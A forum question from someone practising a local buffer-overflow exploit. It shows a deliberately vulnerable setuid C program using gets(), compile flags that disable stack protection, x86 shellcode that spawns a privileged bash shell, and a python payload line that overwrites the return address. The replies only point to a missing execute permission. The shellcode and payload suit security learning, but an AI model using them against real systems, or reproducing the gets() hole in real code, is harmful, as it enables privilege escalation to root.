# BufferOverflow shell not spawn

Tags: shell, buffer-overflow, shellcode

I'm trying a buffer overflow on a simple program

```
#include <stdio.h>

  int main(int argc, char **argv)
  {
    char buf[8]; 
    gets(buf); 
    printf("%s\n", buf); 

    return 0; 
  }
```

Compiled with these options

```
 gcc -g exploit1.c -fno-stack-protector -z execstack -o exploit1
```

The binaries is setuid

```
ls -al exploit1  
-r-sr-x--- 1 root root 6016 janv. 31 01:47 exploit1
```

So I have disable all stack options and ASLR

My shellcode is:

```
\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80
```

But no root shell appear, I have this error:

```
python -c 'print "A"*20 + "\xbf\xfe\xff\xbf"'| ./exploit1 
-bash: ./exploit1: Permission denied
close failed in file object destructor:
sys.excepthook is missing
lost sys.stderr
```

Have I missed something?

Comment: You need world execute access on `exploit1`.

Answer (score 0):

You don't have permission to execute `exploit1`. Root needs to do:

```
chmod o+x exploit1
```